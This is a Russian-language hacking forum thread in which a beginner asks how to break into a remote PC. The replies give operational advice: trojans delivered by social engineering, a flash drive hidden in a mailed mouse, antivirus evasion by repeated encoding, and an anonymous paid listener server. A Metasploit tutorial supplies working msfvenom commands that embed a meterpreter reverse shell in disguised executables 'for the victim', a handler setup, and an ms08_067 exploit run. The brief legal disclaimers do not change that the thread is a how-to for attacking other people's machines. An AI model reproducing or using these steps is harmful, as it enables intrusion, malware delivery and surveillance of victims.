Здрасьте , ачатовцы . Я начинающий и хотел бы спросить с помощью каких средств обычно выполняется взлом удаленного пк ? В гугле nmap описывался как утилита для сканирования пк ,находящихся в локальной сети.
Что именно ты хочешь получить в итоге? Я так понимаю, проще всего тебе будет начать с трояна, который можно впарить при помощи соц. инженерии. А nmap'ом ты сможешь просто просканировать порты и узнать, какие сервисы на них висят. Кстати говоря, у большинства пользователей стоят роутеры, и у многих из них на этих роутерах открыта вебморда наружу. Ну ты понимаешь, к чему я веду...
Ок. Я тоже начинающий. Сначала нужно узнать: 1) Какая система у пользователя стоит. А вдруг там Kali Linux? 2) Какой софт стоит. 3) Внешний ли IP. Скорее всего придется делать троян. Можешь написать сам на Делфи, но лучше используй Metasploit Framework. Там уже все есть, и трояны там с возможностью миграции в процессы, и в реестре перепрописываются. Это все конечно относиться к Винде. Есть в нем и для Линукс троянов шаблоны, но эти трояны как я лично понял, может ошибаюсь , так поправьте, работают только в софте. Тоесть ты линукс софт заражаешь, потом отправляешь пользователю типа - классная игра, или конки погода, или еще что-то. И только когда она работает, доступ есть. В любом случае трой этот тебе придется куда-то запихнуть. Например, в .pdf или .doc. В exe - это уже для слишком тупых пользователей. Отправляешь по почте. И вуаля - тебя блокирует почтовый сервис. Снова идешь назад в MSF и кодируешь троян несколько раз так , чтобы сигнатуры кодитуры не совпадали с уже известными антивиру.... Другая возможность, более правдоподобная в твоем случае - зарази флеху, засунть ее в мышу, пошли по почте чуваку, типа акция какая то. Думаю прокатит в 90% случаев. Главное мышку подороже купи. В трояне нужно прописать будет обратный IP, на котором будет ждать трояна твой "слушатель". Думаю тебе понятно, что этот IP не должен быть твоим домашним IP. Купи выделенный сервер, заплалати за него биткойнами например, чтобы тебя не посекли.. Вообщем как видишь все стоит денег и временных затрат. В крайнем случае можно нанять специалиста.
это интересно, конечно, но не понятно как будет работать, что бы и мышь и флэшка вместе заработали туда нужно ещё юсб хаб встроить, но дальше при подключении флэшки выпадет окно, что сделать с данным накопителем, открыть в проводнике, запустить авторан и тд. или я чего то не понимаю или проще сразу флэшку отсылать
на форуме прочитал... ну я имел ввиду, что нужно взять обычную USB мышку, разобрать, взять флешку зараженную, перепаять ее, чтобы на входе была флешка. мышка понятно работать не будет, но нам ведь нужно, чтобы она один раз только была воткнута. а если троянец был сгенерирован и перекодирован несколько раз, то антивирус врядли его словит, если пользователь что-то заподозрит. а вообще ты прав. если нужно чтобы работала, то лучше тогда опять же потратить деньги и купить псевдо мышь или подобный девайс. Но я надеюсь что это все в целях эксперимента! я крайне вам не рекомендую заниматься такими противозаконными вещами, это уголовно наказуемо!!!
[*] Если вы пользуетесь KALI LINUX , то там уже встроен METASPLOIT FRAMEWORK . Советую вам с ним разобраться , очень мощная утилита (написана на Руби). Инструмент имеет несколько конфигураций: --------------------------------------------------------------------------------------------------------------------------------- 1) Командная оболочка (msfconsole); 2) Веб-интерфейс (Metasploit Community, PRO и Express); 3) Графическая оболочка (Armitage, и более продвинутая версия - Cobalt strike). -------------------------------------------------------------------------------------------------------------------------------- (Для дистрибутива , где нет сборки для Pentesting )Если у вас все еще нет Метасплоита — не беда, скачать его можно на официальном сайте metasploit.com Стоит отметить, что msf корректно работает только с базой PostgreSQL. После того как вы загрузили пакет, откроем консоль и выполним следующее: 1) cd Download/ (перейдем в каталог загрузок); 2) chmod +X metasploit-latest-linux-installer.run (даем права на запуск); 3) sudo ./metasploit-latest-linux-installer.run (запускаем графическую установку). В качестве краткого описания ознакомимся с основными понятиями, а также рассмотрим некоторые команды MSF. [*] Exploit — Фрагмент кода, использующий уязвимость в ПО или ОС для выполнения атаки на систему. [*] Module — Модуль, автоматизирующий процесс какой-либо атаки. [*] Shellcode — Шеллкод. Используется как полезная нагрузка эксплойта, обеспечивающая доступ к командной оболочке ОС. [*] Payload — Полезная, или смысловая нагрузка. Это код, который выполняется после успешного выполнения атаки. Видов нагрузки в msf немало. [*]«Stager» — Нагрузка, разбитая на части. Устанавливая соединение, шелл подгружается полностью. [*]«Reverse shell» — Бэкконнект шел. [*]«Meterpreter» — Пожалуй, один из популярных, если не самый популярный шелл. Имеет кучу возможностей: миграцию в процессы; XOR-шифрование, для обхода IDS и антивирусов; два вида dll-инжекции и т.д. Также можно выбрать «metsvc» нагрузку, что зальет и пропишет meterpreter как сервис. Перед запуском утилиты: service postgresql start msfconsole msf > db_status [*] postgresql connected to msf3 msf > msf > msfvenom Давайте смотреть на некоторые самые важные варианты в этом списке. ==================================================================== - p определяет полезный груз Metasploit, который мы хотим использовать. - e определяет кодирующее устройство, которое мы хотим использовать. - a определение архитектуры, которую мы хотим использовать (дефолт - x86), - s определяет максимальный размер полезного груза. - i определяю количество повторений, с которыми можно закодировать полезный груз. - x определяет пользовательский исполняемый файл использовать в качестве шаблона ========================================================================= msf > msfvenom -l encoders msf > msfvenom -p <payload name> -o msf >msfvenom -p windows/meterpreter/reverse_tcp -0 msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST= <your local IP> LPORT=<whatever port you want to listen on> -x /usr/share/chess.exe -e x86/shikata_ga_nai -i 200 -f exe >chess.exe - p/windows/meterpreter/reverse_tcp определяет полезный груз, который мы хотим включить LHOST назначает местного хозяина (ipconfig пропишите) LPORT определяет порт, на котором мы хотим послушать - x определяет шаблон, который мы хотим использовать и путь к нему - e x86/shikata_ga_nai определяет кодирующее устройство, которое мы хотим использовать - i 200 представляет количество повторений - f exe -> создать исполняемый файл (.exe) chess.exe название файла ---------------------------------------------------------------------------------------- msf > use exploit/multi/handler msf > set PAYLOAD windows/meterpreter/reverse_http msf > set LHOST 192.168.141.122 msf > set LPORT 4444 msf > exploit ---------------------------------------------------------------------------------------- msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.73.128 LPORT=4444 -e x86/shikata_ga_nai -i 10 -x /root/Desktop/installer.exe -f exe > /root/Desktop/installer.exe give victim- отправляем жертве msf > use exploit/multi/handler msf > set PAYLOAD windows/meterpreter/reverse_http msf > set LHOST 192.168.73.128 msf > set LPORT 4444 msf > exploit ----------------------------------------------------------------------------------------- msfconsole msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4 msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp Теперь опции также включают опции полезной нагрузки. Важные опции установить являются LHOST и LPORT. Немного подробнее: ================================================================================= LHOST - IP-адрес локальной машины или машины хакера. LPORT - номер порта, на котором обратный слушатель оболочки получит входящую оболочку. ================================================================================== msf exploit(ms08_067_netapi) > set LHOST 192.168.1.33 msf exploit(ms08_067_netapi) > set LPORT 6666 msf exploit(ms08_067_netapi) > exploit meterpreter > meterpreter > sysinfo meterpreter > ipconfig meterpreter > run vnc Ссылки www.metasploit.com — Официальный сайт Метасплоита www.offensive-security.com/metasploit-unleashed/Main_Page — Официальная документация по metasploit Meterpreter github.com/darkoperator/MSF-Installer — Скрипт автоматической установки metasploit community.rapid7.com/docs/DOC-2100 — Подробная установка metasploit (linux) Практикуйте у себя дома на своих компах ! Не забывайте про закон ! Happy Hacking )